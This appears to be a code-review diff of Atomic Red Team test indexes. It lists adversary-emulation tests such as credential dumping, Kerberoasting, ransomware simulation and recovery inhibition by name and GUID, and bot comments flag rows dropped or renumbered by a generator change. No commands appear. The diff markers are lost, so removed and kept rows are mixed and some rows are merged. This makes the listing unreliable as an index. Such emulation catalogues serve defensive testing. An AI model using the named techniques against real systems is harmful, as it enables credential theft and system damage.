credential-access T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1822 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1823 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1824 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1828 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1829 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1830 credential-access T1003.003 OS Credential Dumping: NTDS 9 Create Volume Shadow Copy with diskshadow b385996c-0e7d-4e27-95a4-aca046b119a7 command_prompt
credential-access T1003.003 OS Credential Dumping: NTDS 10 Copy NTDS in low level NTFS acquisition via MFT parsing f57cb283-c131-4e2f-8a6c-363d575748b2 powershell
credential-access T1003.003 OS Credential Dumping: NTDS 11 Copy NTDS in low level NTFS acquisition via fsutil c7be89f7-5d06-4321-9f90-8676a77e0502 powershell
1831 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1832 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1833 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1861 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
1862 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
1863 discovery T1652 Device Driver Discovery 1 Device Driver Discovery 235b30a2-e5b1-441f-9705-be6231c88ddd powershell
discovery T1652 Device Driver Discovery 2 Device Driver Discovery (Linux) d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1 bash
discovery T1652 Device Driver Discovery 3 Enumerate Kernel Driver Files (Linux) 13c0fef5-9be9-4d7f-9c6b-901624e53770 bash
discovery T1652 Device Driver Discovery 4 List loaded kernel extensions (macOS) 71eab73d-5d7d-4681-9a72-7873489a5b85 bash
discovery T1652 Device Driver Discovery 5 Find Kernel Extensions (macOS) c63bbe52-6f17-4832-b221-f07ba8b1736f bash
1864 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
1865 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
1866 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
1923 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1924 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl/service f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
1925 discovery T1007 System Service Discovery 4 Get-Service Execution 51f17016-d8fa-4360-888a-df4bf92c4a04 command_prompt
discovery T1007 System Service Discovery 5 System Service Discovery - macOS launchctl 9b378962-a75e-4856-b117-2503d6dcebba sh
discovery T1007 System Service Discovery 6 System Service Discovery - Windows Scheduled Tasks (schtasks) 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a command_prompt
discovery T1007 System Service Discovery 7 System Service Discovery - Services Registry Enumeration d70d82bd-bb00-4837-b146-b40d025551b2 powershell
discovery T1007 System Service Discovery 8 System Service Discovery - Linux init scripts 8f2a5d2b-4018-46d4-8f3f-0fea53754690 sh
1926 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1927 discovery T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
1928 discovery T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
2039 discovery T1083 File and Directory Discovery 9 Recursive Enumerate Files And Directories By Powershell 95a21323-770d-434c-80cd-6f6fbf7af432 powershell
2040 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
2041 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
2042 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery via PowerShell (Process Mapping) System Network Connections Discovery FreeBSD, Linux & MacOS b52c8233-8f71-4bd7-9928-49fec8215cf5 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 powershell sh
2043 discovery T1049 System Network Connections Discovery 4 System Network Connections Discovery via ss or lsof (Linux/MacOS) System Discovery using SharpView bcf05343-ef1d-4052-8a27-b00c9be42b9f 96f974bb-a0da-4d87-a744-ff33e73367e9 bash powershell
discovery T1049 System Network Connections Discovery 5 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
discovery T1049 System Network Connections Discovery 6 System Network Connections Discovery via sockstat (Linux, FreeBSD) 997bb0a6-421e-40c7-b5d2-0f493904ef9b sh
discovery T1049 System Network Connections Discovery 7 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
2044 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
2045 discovery T1619 Cloud Storage Object Discovery 2 Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI 070322a4-2c60-4c50-8ffb-c450a34fe7bf powershell
2046 discovery T1619 Cloud Storage Object Discovery 3 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
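Review bot: the T1049 rows change test 3 from System Network Connections Discovery via PowerShell (Process Mapping) (b52c8233-8f71-4bd7-9928-49fec8215cf5, powershell) to the FreeBSD, Linux & MacOS test (9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2) and test 4 from ss or lsof (bcf05343-ef1d-4052-8a27-b00c9be42b9f) to SharpView (96f974bb-a0da-4d87-a744-ff33e73367e9), with the sockstat test (997bb0a6-421e-40c7-b5d2-0f493904ef9b) also in the changed set. That is up to three tests disappearing and two surviving ones changing number in a commit titled "python conversion"; confirm those atomics still exist in the repository and, if they do, fix the generator so the index matches them instead of silently shrinking.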
2187 impact T1486 Data Encrypted for Impact 9 Data Encrypt Using DiskCryptor 44b68e11-9da2-4d45-a0d9-893dabd60f30 command_prompt
2188 impact T1486 Data Encrypted for Impact 10 Akira Ransomware drop Files with .akira Extension and Ransomnote ab3f793f-2dcc-4da5-9c71-34988307263f powershell
2189 impact T1496 Resource Hijacking 1 FreeBSD/macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 sh
impact T1496 Resource Hijacking 2 Windows - Simulate CPU Load with PowerShell 44315fb0-f78d-4cef-b10f-cf21c1fe2c75 powershell
2190 impact T1485 Data Destruction 1 Windows - Overwrite file with SysInternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
2191 impact T1485 Data Destruction 2 FreeBSD/macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 sh
2192 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
2204 impact T1490 Inhibit System Recovery 10 Windows - vssadmin Resize Shadowstorage Volume da558b07-69ae-41b9-b9d4-4d98154a7049 powershell
2205 impact T1490 Inhibit System Recovery 11 Modify VSS Service Permissions a4420f93-5386-4290-b780-f4f66abc7070 command_prompt
2206 impact T1490 Inhibit System Recovery 12 Disable Time Machine ed952f70-91d4-445a-b7ff-30966bfb1aff sh
impact T1490 Inhibit System Recovery 13 Windows - Delete Volume Shadow Copies via Diskshadow 42111a6f-7e7f-482c-9b1b-3cfd090b999c powershell
2207 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
2208 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
2209 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
2226 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
2227 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
2228 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
initial-access T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
initial-access T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
2229 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
2230 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
2231 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
+3 -23
@@ -18,7 +18,6 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
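Review bot: the header `@@ -18,7 +18,6 @@` says this hunk loses one row with no replacement, and judging by the surrounding T1222.002, T1027.013 and T1014 rows the dropped entry is T1027.013 test 3, Password-Protected ZIP Payload Extraction and Execution (c2ca068a-eb1e-498f-9f93-3d554c455916, bash). The commit message "python conversion" gives no reason for an existing atomic to leave the index; if the atomic YAML still exists the new generator is skipping it and the row should come back, and if the atomic was deleted that deletion belongs in the same change and in the message.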
@@ -156,7 +155,8 @@ persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron s
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
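Review bot: the T1176 rows renumber Firefox (cb790029-17e6-4c43-b96f-002ce5f10938) from test 2 to test 3 to make room for the new Chrome/Chromium (Chrome Web Store) test 2 (4c83940d-8ca5-4bb2-8100-f46dc914bc3f), so a run that selects T1176 by test number now executes a different atomic than it did before this change. The GUID column is the stable key; either note the renumbering where users will see it or append the new test after the existing ones rather than inserting it in the middle.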
@@ -181,8 +181,6 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
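Review bot: `@@ -181,8 +181,6 @@` removes the two Linux/macOS T1546.018 Python Startup Hook rows (atomic_hook.pth (Linux) a58c066d-f2f0-42a2-ab70-30af73f89e66 and usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8) with nothing added, while the rendered index.md diff above still carries all five T1546.018 tests. If those atomics still exist, the new generator is not recognising their platform or file layout (`.pth` and `usercustomize.py` entries) and needs fixing before merge; if they were deleted, say so in the commit message.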
@@ -196,8 +194,6 @@ persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1568.002,Dynamic Resolution: Domain Generation Algorithms,1,DGA Simulation (Python),cc367493-3a00-4c4a-a685-16b73339167c,bash
command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
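Review bot: two command-and-control rows drop out here with no replacement (`-196,8 +194,6`): T1568.002 DGA Simulation (Python) (cc367493-3a00-4c4a-a685-16b73339167c, bash) and T1659 Content Injection MITM Proxy Injection (9b360eaf-c778-4f07-a6e7-895c4f01ac1c, bash). Both still appear in the rendered index.md diff above, and the pattern in this file is recently added Linux/macOS tests vanishing hunk after hunk, which reads as a generator regression rather than a cleanup; restore them or document why they go.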
@@ -275,8 +271,6 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
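Review bot: this is the same removal as in the persistence section, now for the privilege-escalation view: the T1546.018 rows a58c066d-f2f0-42a2-ab70-30af73f89e66 and 6e78084a-a433-4702-a838-cc7b765d87e8 disappear with no replacement. Both tactic sections are generated from the same atomic, so whatever fix restores the persistence rows must restore these two as well; treat the two hunks as one issue rather than fixing one in isolation.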
@@ -338,8 +332,6 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
discovery,T1087.002,Account Discovery: Domain Account,24,Account Enumeration with LDAPDomainDump,a54d497e-8dbe-4558-9895-44944baa395f,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
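Review bot: `@@ -338,8 +332,6 @@` drops T1652 Device Driver Discovery tests 2 and 3 for Linux (d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1 and 13c0fef5-9be9-4d7f-9c6b-901624e53770, both bash), leaving this index with no Linux driver-enumeration entry at all. The rendered index.md diff above still lists five T1652 tests including the macOS kernel-extension ones, so the atomics have not obviously gone away; check why the generator no longer emits these two before merging.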
@@ -352,7 +344,6 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtu
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
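Review bot: T1007 test 8, System Service Discovery - Linux init scripts (8f2a5d2b-4018-46d4-8f3f-0fea53754690, sh), is the single row removed in this hunk (`-352,7 +344,6`), which leaves systemctl/service (test 3) as the only Linux service-discovery entry in the file. Same question as for the other removals in this diff: was the atomic deleted, or is the generator skipping it?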
@@ -378,9 +369,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
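Review bot: the T1049 block replaces three rows (test 4 via ss or lsof, bcf05343-ef1d-4052-8a27-b00c9be42b9f; test 5 FreeBSD, Linux & MacOS, 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2; test 6 via sockstat, 997bb0a6-421e-40c7-b5d2-0f493904ef9b) with one row that renumbers the FreeBSD/Linux/macOS test to 3. The ss/lsof and sockstat tests are gone and the survivor changes number; unless those two were deliberately deleted this is a regression, and even if they were, the renumbering needs to be called out so anything referring to "T1049 test 5" is updated.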
@@ -409,14 +398,6 @@ execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with refer
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1569.003,System Services: Systemctl,1,Create and Enable a Malicious systemd Service Unit,e58c8723-5503-4533-b642-535cd20ec648,sh
execution,T1569.003,System Services: Systemctl,2,Create systemd Service Unit from /tmp (Unusual Location),a1fa406e-2354-4a24-b6d6-94157e7564d4,sh
execution,T1569.003,System Services: Systemctl,3,Create systemd Service Unit from /dev/shm (Unusual Location),dce49381-a26b-4d95-bdfa-c607ffe8bee5,sh
execution,T1569.003,System Services: Systemctl,4,Modify Existing systemd Service to Execute Malicious Command,6123928f-6389-4914-8d25-a5d69bd657fa,sh
execution,T1569.003,System Services: Systemctl,5,Execute Command via Transient systemd Service (systemd-run),a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236,sh
execution,T1569.003,System Services: Systemctl,6,Enumerate All systemd Services Using systemctl,1e5be8d4-605a-4acb-8709-2f80b2d8ea95,sh
execution,T1569.003,System Services: Systemctl,7,Enable systemd Service for Persistence with Auto-Restart,2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7,sh
execution,T1569.003,System Services: Systemctl,8,Masquerade Malicious Service as Legitimate System Service,6fec8560-ff64-4bbf-bc79-734fea48f7ca,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
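Review bot: all eight T1569.003 (System Services: Systemctl) rows, tests 1 through 8, disappear from the Linux index in this hunk and nothing replaces them, yet the commit message ("python conversion") says nothing about removing tests. If the systemd atomic definitions for T1569.003 still exist, the index generator was run against a stale checkout and this hunk should be dropped; if they were intentionally removed, say so in the commit message so the index change is traceable.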
@@ -464,7 +445,6 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
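Review bot: the initial-access row for T1659 MITM Proxy Injection (9b360eaf-c778-4f07-a6e7-895c4f01ac1c) is dropped here, and the same GUID is removed again from the macOS index below, under both command-and-control and initial-access. A test listed under several tactics should be added or removed consistently across every index it appears in, so confirm this is a deliberate removal rather than a side effect of regenerating the indexes from an older tree.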
+4 -14
@@ -12,7 +12,6 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
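Review bot: the T1027.013 test 3 row (Password-Protected ZIP Payload Extraction and Execution, c2ca068a-eb1e-498f-9f93-3d554c455916) is removed from the macOS index here with no replacement, while tests 1 and 2 for the same technique remain. Confirm the bash test was intentionally deleted or de-scoped from macOS rather than lost to a stale regeneration; if it still exists, this hunk should not be part of the commit.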
@@ -95,8 +94,9 @@ defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing us
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
